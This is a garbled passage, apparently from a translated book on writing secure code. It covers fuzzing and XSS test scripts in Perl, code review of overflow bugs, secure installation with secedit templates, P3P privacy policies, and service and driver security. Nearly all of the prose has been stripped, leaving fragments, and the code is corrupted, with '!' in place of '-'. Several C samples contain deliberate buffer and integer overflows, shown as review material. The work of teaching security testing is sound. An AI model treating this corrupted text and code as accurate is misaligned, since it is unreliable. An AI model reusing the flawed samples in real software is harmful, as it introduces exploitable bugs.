use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
my $ua = LWP::UserAgent!>new();
$ua!>agent("SOAPWhack/1.0");
my $url = 'http://localhost/MySOAPHandler.dll';
my $iterations = 10;
# coinToss
my $HEADS = 0;
my $TAILS = 1;
open LOGFILE, ">>SOAPWhack.log" or die $!;
# SOAP
# , , ""!
my @soapActions=('','junk','foo.sdl');
for (my $i = 1; $i <= $iterations; $i++) {
print "SOAPWhack: $i of $iterations\r";
# .
my $soapAction = $soapActions[int rand scalar @soapActions];
$soapAction = 'S' x int rand 256 if $soapAction eq 'junk';
my
my
my
my

$soapNamespace = "http://schemas.xmlsoap.org/soap/envelope/";
$schemaInstance = "http://www.w3.org/2001/XMLSchema!instance";
$xsd = "http://www.w3.org/XMLSchema";
$soapEncoding = "http://schemas.xmlsoap.org/soap/encoding/";

19

525

my $spaces = coinToss() == $HEADS ? ' ' : ' ' x int rand 16384;
my $crlf = coinToss() == $HEADS ? '\n' : '\n' x int rand 256;
# SOAP!.
my $soapRequest = POST $url;
$soapRequest! >push_header("SOAPAction" => $soapAction);
$soapRequest!>content_type('text/xml');
$soapRequest!>content("<soap:Envelope " . $spaces .
" xmlns:soap=\"" . $soapNamespace .
"\" xmlns:xsi=\"" . $schemaInstance .
"\" xmlns:xsd=\"" . $xsd .
"\" xmlns:soapenc=\"" . $soapEncoding .
"\"><soap:Body>" . $crlf .
"</soap:Body></soap:Envelope>");
# .
my $soapResponse = $ua!>request($soapRequest);
# .
print LOGFILE "[SOAP Request]";
print LOGFILE $soapRequest!>as_string . "\n";
print LOGFILE "[WSDL response]";
print LOGFILE $soapResponse!>status_line . " ";
print LOGFILE $soapResponse!>as_string . "\n";
}
close LOGFILE;
sub coinToss {
return rand 10 > 5 ? $HEADS : $TAILS;
}
,
.
, 
SoapHttpClientProtocol .NET Framework.


-
13  (cross
site scripting, XSS) , .
, Web 
. , ,
,
13 . 
XSS : 
, .

526

IV

XSS 
http://www.owasp.org.
, XSS
, , : Web
. Web
, ( cookie) .
. ,
HTTP, .
, , XSS
.
13. :
, XSS, ,
. , , 
<>&gt, , , Web 
XSS. 
.


[ (Cpm)] Web
.

Perl 
. ,
, , 
XSS. : ,
 XSS . ,
. XSS ,
. .

# CSSInject.pl
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;
my $url = "http://127.0.0.1/test.asp";
my $css = "xyzzy";
$_ = buildAndSendRequest($url,$css);
# , .
if (index(lc $_, lc $css) != !1) {
print "Possible XSS issue in $url\n";
#
my $css = "<>&gt;";
$_ = buildAndSendRequest($url,$css);
if (index(lc $_, lc $css) != !1) {
print ", XSS! $url\n";
} else {

19

527

print ", ! XSS! $url\n";


}
}
sub buildAndSendRequest {
my ($url, $css) = @_;
# .
my $ua = LWP::UserAgent!>new();
# .
$ua!>agent("CSSInject/v1.42 WindowsXP");
my $req = POST $url, [Name => $css,
Address => $css,
Zip => $css];
my $res = $ua!>request($req);
return $res!>as_string;
}
Secureco2\Chapter19.
, Malicious HTML
Tags Embedded in Client Web Requests ( HTML,
Web) http://www.cert.org/advisories/CA
200002.html, .



. 

. ,
.
! 
, 
. : ,
. (. 
Secureco2\Chapter19), 80
, . 
, ,
.

# TCPJunkServer.pl
use IO::Socket;
my $port = 80;
my $server = IO::Socket::INET!>new(LocalPort => $port,
Type => SOCK_STREAM,

528

IV

Reuse => 1,
Listen => 100)
or die " $port: $@\n";
while ($client = $server!>accept()) {
my $peerip = $client!>peerhost();
my $peerport = $client!>peerport();
my $size = int rand 16384;
my @chars = ('A'..'Z', 'a'..'z', 0..9,
qw( ! @ # $ % ^ & * ! + = ));
my $junk = join ("", @chars[ map{rand @chars } (1 . . $size)]);
print " $peerip:$peerport, ";
print " $size .\n";
$client!>send($junk);
}
close($server);

/


. ,
? , 
, 
. , , 
, , . 
!
( ) 
RunAs ,
. 
, .
,
, .
 
. : ,
!
, Available for Registry Permissions Vulne
rability (http://www.microsoft.com/technet/security/bulletin/MS00095.asp) Offload
ModExpo Registry Permissions Vulnerability (http://www.microsoft.com/technet/security/
bulletin/MS00024.asp), , 
.

19

529


Windows 2000 
,
. , .

; 
. ,
, ,
.
! ,
.
: 
, 
. , , 
, , 
.
. 195 , Windows 2000
.

19-5.

Windows 2000

compatws


Users (),
. ,
ACL
NTFS. ACL
Users ,
Power Users ( )

hisecdc

,
ACL NTFS. 
securedc (. )
Windows 2000 .
Power Users ( )

hisecws


securews. ACL
Power User Terminal Server Users (
) Power
Users ( )

rootsec

ACL 

securedc

, ,
ACL NTFS

securews

, ,
ACL
NTFS. Power Users
( )

530

IV

, 
securews, , securedc,
.
:

secedit /configure /cfg securews.inf /db securews.sdb /overwrite


,
, , . , 
7, 
.
, hisecdc
hisecws , 
hisecdc hisecws. SMB
(Server Message Block). 
SMB, SMB .

!
, . , 
?
. . 
. . 
IP ( 172.100.84.22), 
, ,
( aaaaaaaaaaaaaaaaaaaa.100.84.22). ,
. , 
, :

aaaaaaaaaaaaaaaaaaaa.100.84.22
172.aaaaaaaaaaaaaaaaaaaa.84.22
172.100.aaaaaaaaaaaaaaaaaaaa.22
172.100.84.aaaaaaaaaaaaaaaaaaaa
.
1. .
?
exploit. IP
, . 
IP.
2. exploit. ,
, . 
. IP.
3. .
,
. , exploit,
.

19

531

.
,
.
, 
. exploit
, ,
.
, .

. 191.
4. . 
, 
, 
. , 

. .

: ,
. ,

. ,  ,

. , 
, 
, .
, ,
.
, ,
, 
, .


, 
,
.
, . 
,
.

,
!

532

IV


, . ,
. , : 
A , B? , 
, . , , 
. .
1. .
2. .
3. .

(relative attack surface quotient, RASQ). 
.


. ,
, Windows
ACL, Linux UNIX setuid, 
root,
. , 
. 
!


, 
. ,
, ACL 
, .
.


, 
, RASQ. Win
dows (. 196).

19-6.

Windows

1,0

ISAPI

RPC

0,9

Web

1,0
0,6

0,8

1,0

0,4

0,7

0,8

0,9

533

19

19-6.

()

,
SYSTEM

0,9

0,9

Web

1,0


(Guest)

0,9

ACL

0,7

ACL

0,4

ACL

0,9

Windows
. 194.
400
350
300
250
200
150
100
50
0
Windows 2000

Windows .NET
Server

Windows .NET
Server
IIS

Windows XP

Windows XP

ICF

. 194.
Windows
,
,  (
). , Linux OS/400
.
,
. 
RASQ:
.
, RASQ, , 5%.
,
(function point analysis) .
, .

534

IV

.
, , 
, . 
, 
, , 
; STRIDE
.

. 
.
,
. , 

.

20

, 
, , 
. 

. , , , , 
.
(, telnet 
.) , , 
, . 
,
. ,
.
, . (Jack Ganssle)
A Guide to Code Inspections ( ) (http://
www.ganssle.com/Inspections.pdf) ,
. , 
, . 

, 
. ,
, : ,
9 , ,
. 2030 
, .
? 
(reviewer) : (moderator),
(reader), (recorder) (author).

536

IV

.
. 
, : 
, , . 
, 
. 
, . 
, ,
. , , 
, 
. , ,
, 
. , , ,
. , : 
, 
.

, 
. , RPC,
, 
RPC. . 
, .
, : 
,
, . ,
, ,
, , .
, , 
API. : ,
, ,
.
 ,
. 
? ?
? 
, , 
.
. ,
, ,
, . ,
?
, ? 
?

20

537


, . 

. .


, 
. 250 000 ,
. , , 
. 
, , .
, 
. , ,
.
. ,
, 
, 
. ,
.
, 
. , 
, .
, 
.
,
.
, .
, ( 
)
. ,
. ,
, 
. , 
. 
, . , 
1200 , 
, , ?
Windows Security Push 2002 ,
, 
, .
: , 
.
; , 

538

IV


.


Microsoft
. 
: , .
. 
, , 
. ,
. , , 
: ? 
, .
! , , 
, : ,
,
, 
.
,
. , 
, .
. 
, ,
.
, , , , 
.


,
. 
, . 
, ( 5)
strncpy, strcpy. , ,
NULL, 
.
;
.
,
strncpy, strncat snprintf
. ,
. ,
.

20

539

; 
.
, . , 
5 ,
. ,
, ,
exploit.

, .

DoS. _alloca 

,
. , , _alloca,
.
Unicode ANSI,
.
WideCharToMultiByte:

int WideCharToMultiByte(
UINT CodePage,
DWORD dwFlags,
LPCWSTR lpWideCharStr,
int cchWideChar,
LPSTR lpMultiByteStr,
int cbMultiByte,
LPCSTR lpDefaultChar,
LPBOOL lpUsedDefaultChar

//
//
//
//
//
//
//
//
//
//



""





,

);
(Unicode)
, . MultiByteToWideChar
. ,
, ,
ANSI. API, 
( ), DCOM
IIS C++. , 
, , ,
. , (
) , 
.
TCHAR.
char, WCHAR #define
UNICODE . , 
. 
, .

540

IV


. ,
,
. 

.
.
, .

int Example(char* str, int size)


{
char buf[80];
if(size < sizeof(buf))
{
// ...
strcpy(buf, str);
}
}
: ? , ? , 
: . sizeof 
size_t.
size? , sizeof(buf)
, 
. , 
, .
, 
. , 
, .

. ,
,
, !
MAX_INT.
, 
, , ,
:

if(result < original)


{
//!
return false;
}
GetTickCount
. GetTickCount 40 ,
.

20

541


. :

typedef struct _LSA_UNICODE_STRING {


USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING;
Length MaximumLength , 
, 32 768 Unicode. 
, WCHAR 
:

void InitLsaUnicodeString(const WCHAR* str,


LSA_UNICODE_STR* pUnicodeStr)
{
if(str == NULL)
{
pUnicodeStr!>Buffer = NULL;
pUnicodeStr!>Length = 0;
pUnicodeStr!>MaximumLength = 0;
}
else
{
unsigned short len =
(unsigned short)wcslen(str) * sizeof(WCHAR);
pUnicodeStr!>Buffer = str;
pUnicodeStr!>Length = len;
pUnicodeStr!>MaximumLength = len;
}
}
; , , 
32 769 . , (calc.exe)
. 2. 
, , 0x10002. 
unsigned short, , Length 2! 
, , ,
LSA_UNICODE_STRING ! , Length
MaximumLength , wcscpy!
(truncating) .
:

unsigned long len = wcslen(str) * sizeof(WCHAR);


if(len > 0xffff)
{
pUnicodeStr!>Buffer = NULL;
pUnicodeStr!>Length = 0;

542

IV

pUnicodeStr!>MaximumLength = 0;
}
: 
, . :

int AllocateStructs(void** ppMem,


unsigned short StructSize,
unsigned short Count)
{
unsigned short bytes_req;
bytes_req = StructSize * Count;
*ppMem = malloc(bytes_req);
if(*ppMem == NULL)
return !1;
else
return 0;
}
LSA_UNICODE_STRING, ,
, , 

. bytes_req unsigned integer
. :

int AllocateStructs(void** ppMem,


unsigned short StructSize,
unsigned short Count)
{
unsigned short bytes_req;
if(StructSize == 0 || Count > 0xffff/StructSize)
{
assert(false);
return !1;
}
bytes_req = StructSize * Count;
*ppMem = malloc(bytes_req);
if(*ppMem == NULL)
return !1;
else
return 0;
}
, 
, 
. , 

20

543

. , 
, ,
.
: 
, .
,
. 
, . ,
, . 
, 
.

:
, :

void AllocMemory(size_t cbAllocSize)


{
// '\0'
cbAllocSize!!;
char *szData = malloc(cbAllocSize);
...
}
, ,
cbAllocSize == 0! : 
:

szDATA != NULL
cbAllocSize 1! ( 
) highend 1  4 000 000 000.
: , .


 ,
, : ,
. , , 
. 
strncpy, , (. 5).
,
, , , Imperso
nateNamedPipeClient. ,
,
.
:

while(bytes = recv(sock, buf, len, 0))


WriteFile(hFile, buf, bytes, &written, NULL);

544

IV

? recv 0,
TCP.
.  , bytes
1 WriteFile
, hFile. 
( 64 
).
, , 
, .
AdjustTokenPrivileges. :
,
. , 
, GetLastError, ,
, :

ERROR_SUCCESS

ERROR_NOT_ALL_ASSIGNED


NewState . 

. PreviousState 

, , , 
, . , TRUE,
GetLastError , 
. . :
,
.


,

. ,
. C++ ,
, .. , 
, .


, ,
, ,
. , ( ,
) , ,
. . ,
, 
:

20

545

struct blob
{
DWORD Size;
BYTE* Data;
};
, .
4 . Size, 
. , ,
, , 
( ) .
, ,
. (Size)
.

Microsoft Office. ,
, .

,
. 
, , 
,
, . 

, 
. , !

21

,
, 
. , 
, ,
DoS, 
, 
.
,

. ,

.
, . ,

Windows 2000 ( ) Windows NT 4 
Security Configuration Editor,
.
Internet
Security Scanner Internet Security Systems.
UNIX Windows NT, ,
.
. 

, , 
, 

21

547

DoS. , 
,
;

. ,
, ,

, , , 
. 
, Windows 2000
.


,
, .

, , 
Windows 2000 ( ).
, 
.
, 
, CREATOR OWNER ().
?  
.
 ,
.
. ,
HKEY_CUR
RENT_USER, HKEY_LOCAL_MACHINE. 
, . 
, 
?

?
. Systems Management Server
(SMS) Remote Agent , 
, , .
( )
http://www.microsoft.com/technet/security/bulletin/fq00012.asp. ,
. ,
,

Local System,
.
Windows NT 4.0 AeDebug 
. AeDebug ,

548

IV

.

, ,
( http://www.microsoft.com/Tech
Net/security/bulletin/fq00008.asp). ? .
, .
, Local System
DoS? ( , 
.) ,

!
, 
SNMP (Simple Network Management Protocol) (
http://www.microsoft.com/TechNet/security/bulletin/fq00096.asp).
SNMP [ Security Not My
Problem ( )] , 
.
SNMP
(community string). , 
, , 
( 
). , (sniffer), 
, , .
, Para
meters, SNMP, 
(, ). ,
, ,
SNMP SET , , .
, . 
( 
)
. , ,
, . ,
, .
:
.
, 
. ,
(, ), 
. 
. ,
,
. , 
, . 

. ,

21

549

:
. .
,
. , ,
: Program Files,
. 
, Program Files , ,
, , 
NTFS. 
,
. , 
ACL .

!

, . 

, , 
.
, ,
,
. 
, , 
[ Task Mana
ger ( )], .
, ,
!


(Security Configuration Editor)
Service Pack 4 Windows NT 4 Windows 2000
. Microsoft
(Microsoft Management Console, MMC) . ,
: 

HKEY_LOCAL_MACHINE\Software. MMC
Security Templates ( ) Security Configuration and
Analysis ( ) (. 211).
(templates) 
(security databases). ,
. Security Templates, 
%<__>%\Security\Template
New Template ( ). 
. , null.
. 212 MMC .

550

IV

. 211. / Security
Templates Security Configuration And Analysis

. 212.

MMC null

. 
Security Configuration and Analysis 
Open Database ( ). 
; NewApp.sdb. Import
Template ( ) ,
. null (. 213).
. 
,
. MMC (. 214),
null, Registry ()
Add Key ( ).

21

551

. 213. Import Template,


. 214.

Select Registry Key ( ) 



( ACL).
File System ( ).
. MMC
, . Notepad (),
:

[Unicode]
Unicode=yes
[Registry Values]
[Registry Keys]
"MACHINE\SOFTWARE\NewApp",0,"D:PAR(A;OICI;KA;;;BA)(A;CI;CCSWRC;;;WD) "
[File Security]
"E:\NewApp",0,"D:AR(A;OICI;FA;;;BA)(A;OICI;0x1f00e9;;;W D)"
[Version]
signature="$CHICAGO$"
Revision=1

552

IV

, (
E:\NewApp), %newapp_install%. 
(. Secureco2\Chapter21\SecInstall).

/*
INF! ,
%newapp_install% ( )
.inf,
.
*/
#define UNICODE
#include <windows.h>
#include <stdio.h>
/*
,
! ,
, ,
.
*/
class SmartHandle
{
public:
SmartHandle()
{
Handle = INVALID_HANDLE_VALUE;
}
~SmartHandle()
{
if(IsValid())
{
CloseHandle(Handle);
}
}
bool IsValid(void)
{
if(Handle != INVALID_HANDLE_VALUE &&
Handle != NULL)
{
return true;
}
else
{
return false;
}
}

21

HANDLE Handle;
};
/*
UNICODE?
wmain main,
UNICODE.
*/
int wmain(int argc, WCHAR* argv[])
{
SmartHandle hInput;
SmartHandle hOutput;
SmartHandle hMap;
WCHAR* pFile;
WCHAR* pTmp;
WCHAR* pLast;
DWORD filesize;
DWORD dirlen;
if(argc != 4)
{
wprintf(L" : %s [ ]", argv[0]);
wprintf(L" [ ] [ ]\n");
return !1;
}
dirlen = wcslen(argv[3]);
hInput.Handle = CreateFile(argv[1],
GENERIC_READ,
0,
//
NULL, //
OPEN_EXISTING,
// ,
FILE_ATTRIBUTE_NORMAL, //
NULL);
//
if(!hInput.IsValid())
{
wprintf(L" %s\n", argv[1]);
return !1;
}
DWORD highsize = 0;
filesize = GetFileSize(hInput.Handle, &highsize);
if(highsize != 0 || filesize == ~0)
{
// 4
// INF! ???

553

554

IV

wprintf(L" %s .\n", argv[1]);


return !1;
}
/*
,

*/
hOutput.Handle = CreateFile(argv[2],
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(!hOutput.IsValid())
{
wprintf(L" %s\n", argv[2]);
return !1;
}
//
//
//
//

, ,
.
,
, .

hMap.Handle = CreateFileMapping(hInput.Handle, // .
NULL,
// .
PAGE_READONLY, // .
0,
//
0,
// !
// .
NULL);
// .

if(!hMap.IsValid())
{
wprintf(L" %s\n", argv[1]);
return !1;
}
// .
pFile = (WCHAR*)MapViewOfFile(hMap.Handle,
FILE_MAP_READ, 0, 0, 0);
if(pFile == NULL)
{
wprintf(L" %s\n", argv[1]);
return !1;

21

}
//
// .
pTmp = pLast = pFile;
DWORD subst_len = wcslen(L"%newapp_install%");
while(1)
{
DWORD written, bytes_out;
pTmp = wcsstr(pLast, L"%newapp_install%");
if(pTmp != NULL)
{
// .
// ?
bytes_out = (pTmp ! pLast) * sizeof(WCHAR);
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written )
{
wprintf(L" %s\n", argv[2 ]);
return !1;
}
// %newapp_install%
// .
if(!WriteFile(hOutput.Handle, argv[3],
dirlen * sizeof(WCHAR), &written, NULL) ||
dirlen * sizeof(WCHAR) != written)
{
wprintf(L" %s\n", argv[2]);
UnmapViewOfFile(pFile);
return !1;
}
pTmp += subst_len;
pLast = pTmp;
}
else
{
//
bytes_out = (BYTE*)pFile + filesize ! (BYTE*)pLast;
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written)
{

555

556

IV

wprintf(L" %s \n", argv[2]);


UnmapViewOfFile(pFile);
return !1;
}
else
{
// ! !
UnmapViewOfFile(pFile);
break;
}
}
}
//
// .
return 0;
}
, ? ,  ,
inf. 
,
. , 
, .

[e:\]secedit /configure /db NewApp.sdb /cfg out.inf /areas


REGKEYS FILESTORE /verbose
,
. 
Out.inf , 
. (,
)
INF, 
. , 
Windows NT 3.51 4 ,
, 
!

API-
: ,
.
,
Windows NT.
API . Windows NT 4
API. 
, 
, . ,
AddAccessAlowedAce 
ACE. ACE ,

21

557

AddAce, . ( AddAccess
AlowedAceEx, ACE,
Windows 2000 .)
API
, 
http://www.windowsitsecurity.com/Articles/Index.cfm?Article
ID=9696. API, 
. 
: DACL

. DACL
. 
, . DACL 
. ACE 
ACE.

Windows Installer
, Windows,
, Microsoft Platform SDK.
Platform SDK ,
, SDK , 
Guidelines for Authoring Secure Installations (
).
, .
, 

.
Windows Installer
LockPermissions, ,
.
, 
(private), (public) (restricted public).
, 
, ,
. 
. 
Windows .
Windows Installer 
. : 
+ ,
.
. ,
,
.

558

IV

, 
; 
, . 

.
,

. , 
,
Open 
. 

,
. Platform SDK.

(transforms).
. (
, ), 
.
(custom actions)
, . ,
,
Windows Installer,
. 
, ,
, msidbCustom
ActionTypeNoImpersonate
.
Windows Installer 
, ,
, 
. Windows Installer 
, .

,
. 
 , 
, 
.
,
.

22


* (privacy) 
. ,
. 
, 
, 
, ,
. 
, ,
.
, , ,
, .
! 
. , 
.
, Porsche 
? ,
. .

. ,
, ,

* . . .

560

IV

.
, ,
. 
, .



, 
. , 
. , 
. :
, 
. 
 . , 
, 
,
. :
. , .


.
.
, Web 
. ,
. , , 

.
, 
. 
,  .
, .


. , 
. 
,
Records, Computers and the Rights of Citizens (,
), ,
1973 . (http://aspe.hhs.gov/datacncl/1973privacy/
tocprefacemembers.htm). , ,
, . 1998 . 

22

561

Fair Information Practices ( 


) (http://www.ftc.gov/reports/privacy3/fairinfo.htm).

, , 

.


(personally identifiable information,
PII) , 
. PII .
.
, .
TCP/IP 
PII,  .
PII, 
.


1998 . (http://
www.cdt.org/privacy/eudirective/EU_Directive_.html), ,
PII. 
PII , 
.
, .
2000 . 
,
. , 
, .


(Safe Harbor Principles, http://www.export.gov/safeharbor/)
, 
. , ,
, 
, .

, ,
, . Web
(privacy statement), 
.
, ,
. 
, , 
, , ,

562

IV

, Web ,
.


. , 
, 
.

, , 
,
. , 
,
,
. ,

. , CRM (Customer Relationship Mana
gement ), 
(, 
). , 
.



. 
. ,
.
,
.

, 
.
, ,
. 
, , 
,
, .

, 
.
, .

.

22

563



. ,
. 
,

. , 
.



.
Web . 
, .

, . 
,

. . 221 ,
: BBBOnline (http://www.bbbonline.com), ESRB (http://
www.esrb.org/wp_join.asp) TRUSTe (http://www.truste.org/programs/ pub_how_to_
join.html).

. 221.



.
. 222 
.

22-1.

URL-



(Computer
Fraud and Abuse Act, CFAA)




, 
,

http://www4.law.cor
nell.edu/uscode/18/
1030.html

. . .

564

IV

22-1.

()

URL-


(GrammLeach Bliley Act,
GLBA)


.

,

http://www.senate.gov/
~banking/conf/




(Health Information
Portability Accountability
Act, HIPAA)


.

,

http://cms.hhs.gov/hipaa/

(Childrens Online Privacy


Protection Act, COPPA)



13

http://www.ftc.gov/opa/
1999/9910/childfinal.htm


,
. 
, .
, , ,
. 
. 

.
, ,
. PII, ,
.


, . , 
, 
. , :
;
;
;
, 
;
:
Web;

22

565

;
.

(Chief Privacy Officer, CPO) 
(privacy advocate) . 

. 
(Council of Chief Privacy Officers, http://www.conference
board.org/search/ dcouncil.cfm?councilsid=173) .
. 222
. CPO , 

. 
, CPO
, .

. 222.


CPO , 
. 

. 
, , , 
. 
, , 
. CPO 
, 
,
.

566

IV



, CPO.
, ,
.
:
;
;
;
, 
;

;
, 
.

,

Web , 
.
. ,
. ,
. , ,
, , 

. , ,
, .


,

. 
, , 
(. 223).

, , , 
.
Web, ,
P3P (Platform for Privacy
Preferences) ( ). , 
cookie, , 
, , ,
. 
.

22

567

,
, 
. (,  
) ,
. 
.



,
SQM cookie-

. 223.

P3P


. 
, 
. ,
, .

.
,
.


1.
, 
, 

. , 
. ,
. . .

568

IV

, . 
,
:
;
;
;
;

;
, ,
;
;
?

1.1.
,
: Web?
, , 
. ,
? , ?
, , .

1.2 Web-
Web, 
: Web ?
? 
? cookie, 
. , 
. 
. Web P3P?



, .
, 
.
. 
. , 
, . 
Secureco2\Chapter22.


Web .
, . 

22

569

,
,
. , 
.
.
, 
. Web
TRUSTe (http://www.truste.org/ bus/pub_resourceguide.html) 
, . 
Microsoft http:/
/www.microsoft.com/info/privacy.htm.

P3P
Platform for Privacy Preferences (P3P) (http://www.w3.org/P3P) , 
W3C (World Wide Web Consortium) 
Web , 
. ?
Internet Explorer 6,
(. 224).
P3P.

. 224.

Internet Explorer 6

, Web
.

, . 
cookie . 
P3P Web. Web
P3P ,
(Medium) . P3P
(.
P3P).



.
.
. ,
,
.
.

P3P
, P3P Web.
, P3P, , 

570

IV

. Internet Explorer 6 Web 


Privacy Report ( ) View (). . 225
, Web, 
.

. 225.
P3P
Web, P3P, ,
. 226. , . 
TRUSTe 
.

. 226.

P3P

P3P 
. XML 
. P3P.xml W3C,
Web. , Microsoft
http://www.microsoft.com/w3c/p3p.xml. :

22

571

<META xmlns="http://www.w3.org/2000/12/p3pv1">
<POLICY!REFERENCES>
<POLICY!REF about="Policy.xml">
<INCLUDE>\*</INCLUDE>
<COOKIE!INCLUDE name="*" value="*" domain="*" path="*"/>
</POLICY!REF>
</POLICY!REFERENCES>
</META>
Web, Internet Explo
rer 6 W3C Web, P3P.xml, 
POLICYREF, XML 
. ,
. .
XML .
discuri Web. 
Internet Explorer 6 here.
Internet Explorer 6 . 
Web 
, .
. Web
, . 

. 
http://www.w3.org P3P.

<POLICY xmlns="http://www.w3.org/2000/12/p3pv1"
discuri="policy.htm"
opturi="http://msdn.microsoft.com/privacy">
<ENTITY>
<DATA!GROUP>
<DATA ref="#business.name">Microsoft</DATA>
<DATA ref="#business.contact!info.postal.street">One Microsoft Way
</DATA>
<DATA ref="#business.contact!info.postal.city">Redmond</DATA>
<DATA ref="#business.contact!info.postal.stateprov">WA</DATA>
<DATA ref="#business.contact!info.postal.postalcode">78052</DATA>
<DATA ref="#business.contact!info.postal.country">USA</DATA>
<DATA ref="#business.contact!info.online.email">michael</DATA>
<DATA ref="#business.contact!info.telecom.telephone.intcode">1
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.loccode">425
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.number">
8828080</DATA>
</DATA!GROUP>
</ENTITY>
<ACCESS><nonident/></ACCESS>
<STATEMENT>
<PURPOSE><admin/><develop/></PURPOSE>

572

IV

<RECIPIENT><ours/></RECIPIENT>
<RETENTION><stated!purpose/></RETENTION>
<DATA!GROUP>
<DATA ref="#dynamic.clickstream.server"/>
<DATA ref="#dynamic.http.useragent"/>
</DATA!GROUP>
</STATEMENT>
<STATEMENT>
<PURPOSE><pseudo!analysis required="opt!in"/></PURPOSE>
<RECIPIENT><other!recipient/></RECIPIENT>
<RETENTION><indefinitely/></RETENTION>
<DATA!GROUP>
<DATA ref="#user.home!info.postal.postalcode">
<CATEGORIES><demographic/></CATEGORIES>
</DATA>
</DATA!GROUP>
</STATEMENT>
</POLICY>
Web, , 
. Internet Explo
rer 6 Privacy Report
View. Web
. , TRUSTe (http://www.truste.org/bus/pub_re
sourceguide.html).

. 227.
Internet Information Services (IIS)
. ,
Internet Explorer 6 , 
.
XML, , 
P3P. ( http://www.w3.org/TR/P3P/#compact_policies).
. 227 XML.

22

573

P3P
. P3P Web
(http://msdn.microsoft.com/workshop/security/privacy/
overview/createprivacypolicy.asp).

Internet Explorer 6 P3P .


, ,
, , 
.
. ,

Web, .
Help (), 
. 
(software
development kit, SDK), Privacy Policy ( 
) , , 
, Web. Privacy Settings
( ) DLL, 
, SDK.
. 228
Microsoft Windows Media Player 9 beta, 
.

. 228.

Privacy Options

, , 
.
, ?
CRM.
. , 

574

IV

? 

,
, (. 2210).

. 229.

. 2210.

, Web,
, .
,  ,
?
, ,
,
.

22

575

, . ,
, .
, ! (: 
!) , ,
, Web , ,
. 
. ,
: 

.

, , 
HCKU
.


Windows Media Player 7 , 
 DVD Microsoft. :
, 
. , , , 
, , .
,
, . 
, ,
, . 
 , 

,
.


,
. 

, : , 
?
.
,
: ? 
, , 
,
. , , 
, , .
,
.

576

IV


,
, . , 
,
. 
.
. , 
,
. ,
. ,
. . . 2211 ,
, 
. , ,
.

. 2211.


, 
. 
. , 
.

22

577

. , .
: , 
, , .


,
, 
.
, 
.


, 
. , .
? 
; , 
.


: , 
. ? 
, 
? 
, . ,
. ,
, , . , 
, 
.
, ,
.
. 2212 ,  
. 
SSL/TLS Web. Web
, IPSec.
,
. .
,
EDI (Electronic Data Interchange) 
, .
.
. ,
.
.

578

IV

IPSec

IPSec

EDI

SSL/TLS
Web-

SSL/TLS

. 2212.

, 
, . 
,
.
.
,
. , ,
. ,
, 
.

23

. 
, ,
.
!



, , 
,
. , , 
. ,
: stuff.txt c:\secrets
tuff\docs, .
, , 
, , 
. : ,
,
 , .
,
, .

580

IV



, UNIX, Microsoft
Windows NT . 
, 
. ?

,
Microsoft Windows ,
. 
. ,
, SYSTEM,
. , 
, . 
Windows 
; , ,
, . 
, , 
. Windows
.
 ,
, , .
,
, .
, SYSTEM
OpenWindowStation GetThreadDesktop,
.
Windows
.

 , , RPC, , 
COM 
(MessageBox) MB_SERVICE_NOTIFICATION.
.
, ACL ,
, (127.0.0.1).
, 
:
,
LocalSystem

Security Configuration
Manager [Log on As ( ) Allow Service to interact with desktop

23

581

( ) HKLM\
CCS\Services\MyService\Type 0x0100 = 0x0100,

CreateService dwServiceType, SERVICE_INTERACTIVE_PROCESS SERVI


CE_INTERACTIVE_PROCESS,

MessageBox, uType (MB_DEFAULT_DESK


TOP_ONLY | MB_SERVICE_NOTIFICATION | MB_SERVICE_NOTIFICATION_NT3X)
,

OpenWindowStation (winsta0, ...), SetProcessWindowStation, OpenDesk


top(Default,) , , SetThreatDesktop
,

LoadLibrary GetProcAddress 
.
CreateProcess , SYSTEM,
STARTUPINFO.lpDesktop 
(Winsta0\Default). 
, 
Create
ProcessAsUser.



, .

.

LocalSystem
LocalSystem .
.
Windows 2000 , Windows 2000,
. ,
. , 
,
, Windows 2000
. API,
(, LogonUser), Windows XP
. LocalSystem,
, 
. LocalSystem
: .
LocalSystem , 
.

582

IV


Network Service ( ) ,
Windows XP. , 

LocalSystem. LocalSystem, 
( , , 
).
.
.

LocalService
LocalService Network Service,
. ,
. LocalSystem, 
.



, 
, , . , 
, , 
.
. ( )
Internet Security Systems, , 
. ,
Windows NT. ,
, . 
, 
, 
.
,
, 
. 
, , ,
.
, ! , . 

: ! 
, , 
.

, , ,
, Lsadump2, (Todd
Sabin) BindView. , 
. , , , 
, ,

23

583


. , Lsa
dump2 lsass. , 
. 
,
.
.
, 
, , ,
. , 
. 
, ,
. 
, 
,
. ,
.


.
, 
, ; , 
, 
.
.
, 
, .

. 
, . , 
, ,
.
, . 

.



, , 
, , 
. , Web
Server:. , ,
 . 
.
, .

584

IV

Web IIS 5
URLScan (http://www.microsoft.com/windows2000/downloads/recommended/
urlscan/default.asp).



, : 
, ,
, .
, Ism.dll (, 
.htr) IIS 5, , Splat.htr, 
Error: The requested file could not be found , 
Ism.dll HTR.
, Ism.dll 404, 
Web.

-

, 
. 19.

!
 , 
, . ,
A, B, A
. ,

.



, . , 
. , 
. .

. , , 
.
, ,
Driver Verifier 
Ntoskrnl.exe Hal.dll ,
.
Windows DDK, ,

23

585

.
Strsafe.h (. 5). 
NTStrsafe.h
Windows XP SP 1 DDK (http:// www.microsoft.com/ddk/relnote
XPsp1.asp).


 , ,
FILE_DEVICE_SECURE_OPEN.
, ,
. / 
.
, DACL 
, INF .
. AddReg [ClassIns
tall32] [DDInstall. HW] INF. , INF
, WHQL (Windows Hardware Quality Labs),
.
IoCreateDeviceSecure ( DDK
Microsoft Windows .NET Server 2003 Windows XP SP1)
 ,
(raw) ( ,
). Windows 2000
; Wdmsec.h 
Wdmsec.dll.
, /
(input/output control, IOCTL) FILE_ANY_ACCESS.
 . 
IOCTL 
IoValidateDeviceIoControlAccess ,
.
Windows 2000 Wdmsec.h.
Windows (Windows Management Instrumentation,
WMI) ,
: , .
Windows XP WMI
GUID , Windows .NET Server 2003
.
WMI , [DDInstall.WMI] ( DDK
Windows .NET Server 2003 Windows XP SP1) AddReg
